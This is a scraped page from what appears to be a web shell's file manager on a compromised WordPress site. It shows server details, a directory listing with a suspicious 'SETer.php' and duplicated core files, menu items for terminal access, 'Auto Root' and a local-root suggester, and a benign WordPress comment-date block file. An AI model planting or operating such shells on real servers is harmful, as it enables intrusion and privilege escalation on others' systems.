Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 3.148.202.74
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
theprintave /
wp-includes /
blocks /
table /
Delete
Unzip
Name
Size
Permission
Date
Action
SETer.php
166.01
KB
-rw-r--r--
2025-03-30 05:28
block-bindings-20250514173405.php
5.46
KB
-rw-r--r--
2024-07-16 17:55
block.json
4.3
KB
-rw-r--r--
2025-04-15 17:44
cache-compat.php
5.83
KB
-rw-r--r--
2022-10-10 18:22
class-json.php
42.66
KB
-rw-r--r--
2023-02-03 13:35
class-oembed.php
401
B
-rw-r--r--
2022-06-17 11:20
class-simplepie.php
453
B
-rw-r--r--
2024-11-13 12:36
class-wp-locale.php
16.49
KB
-rw-r--r--
2025-04-15 17:44
class-wp-phpmailer.php
3.71
KB
-rw-r--r--
2025-04-15 17:44
class-wp-taxonomy.php
18.12
KB
-rw-r--r--
2025-04-15 17:44
class-wp-user.php
22.46
KB
-rw-r--r--
2025-04-15 17:44
class-wp.php
25.7
KB
-rw-r--r--
2025-04-15 17:44
comment-date-20250514173159.php
1.82
KB
-rw-r--r--
2024-11-13 12:36
comment-date.php
1.82
KB
-rw-r--r--
2024-11-13 12:36
comments-title.php
2.71
KB
-rw-r--r--
2024-07-16 17:55
data.min.js
25
KB
-rw-r--r--
2025-04-15 17:44
default-widgets.php
2.24
KB
-rw-r--r--
2025-04-15 17:44
edit-post.js
120.43
KB
-rw-r--r--
2025-04-30 17:44
editor-rtl.css
1.56
KB
-rw-r--r--
2024-04-03 05:49
editor-rtl.min.css
1.46
KB
-rw-r--r--
2024-04-03 05:49
editor.css
856
B
-rw-r--r--
2024-07-16 17:55
editor.min.css
1.46
KB
-rw-r--r--
2024-04-03 05:49
element.min.js
11.69
KB
-rw-r--r--
2025-04-15 17:44
home-link.php
5.31
KB
-rw-r--r--
2025-04-15 17:44
https-migration.php
4.63
KB
-rw-r--r--
2023-07-10 22:38
latest-comments.php
4.92
KB
-rw-r--r--
2024-07-16 17:55
latest-posts.php
8.34
KB
-rw-r--r--
2024-11-13 12:36
ms-network-20250514173520.php
3.69
KB
-rw-r--r--
2023-05-02 11:26
ms-network.php
3.69
KB
-rw-r--r--
2023-05-02 11:26
post-title.php
2.09
KB
-rw-r--r--
2024-07-16 17:55
registration-functions.php
200
B
-rw-r--r--
2020-11-12 11:17
shortcode.min-20250513213234.js
2.58
KB
-rw-r--r--
2022-09-23 19:55
speculative-loading.php
8.36
KB
-rw-r--r--
2025-04-15 17:44
style-engine-20250514173207.php
7.39
KB
-rw-r--r--
2025-05-09 07:39
style-engine.php
7.39
KB
-rw-r--r--
2025-05-09 07:39
style-rtl.css
3.96
KB
-rw-r--r--
2024-04-03 05:49
style-rtl.min.css
3.76
KB
-rw-r--r--
2024-04-03 05:49
style.css
3.96
KB
-rw-r--r--
2024-04-03 05:49
style.min.css
3.76
KB
-rw-r--r--
2024-04-03 05:49
theme-rtl.css
261
B
-rw-r--r--
2024-07-16 17:55
theme-rtl.min.css
232
B
-rw-r--r--
2024-07-16 17:55
theme.css
261
B
-rw-r--r--
2024-07-16 17:55
theme.min.css
232
B
-rw-r--r--
2024-07-16 17:55
Save
Rename
<?php /** * Server-side rendering of the `core/comment-date` block. * * @package WordPress */ /** * Renders the `core/comment-date` block on the server. * * @since 6.0.0 * * @param array $attributes Block attributes. * @param string $content Block default content. * @param WP_Block $block Block instance. * @return string Return the post comment's date. */ function render_block_core_comment_date( $attributes, $content, $block ) { if ( ! isset( $block->context['commentId'] ) ) { return ''; } $comment = get_comment( $block->context['commentId'] ); if ( empty( $comment ) ) { return ''; } $classes = ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) ? 'has-link-color' : ''; $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $classes ) ); if ( isset( $attributes['format'] ) && 'human-diff' === $attributes['format'] ) { // translators: %s: human-readable time difference. $formatted_date = sprintf( __( '%s ago' ), human_time_diff( get_comment_date( 'U', $comment ) ) ); } else { $formatted_date = get_comment_date( empty( $attributes['format'] ) ? '' : $attributes['format'], $comment ); } $link = get_comment_link( $comment ); if ( ! empty( $attributes['isLink'] ) ) { $formatted_date = sprintf( '<a href="%1s">%2s</a>', esc_url( $link ), $formatted_date ); } return sprintf( '<div %1$s><time datetime="%2$s">%3$s</time></div>', $wrapper_attributes, esc_attr( get_comment_date( 'c', $comment ) ), $formatted_date ); } /** * Registers the `core/comment-date` block on the server. * * @since 6.0.0 */ function register_block_core_comment_date() { register_block_type_from_metadata( __DIR__ . '/comment-date', array( 'render_callback' => 'render_block_core_comment_date', ) ); } add_action( 'init', 'register_block_core_comment_date' );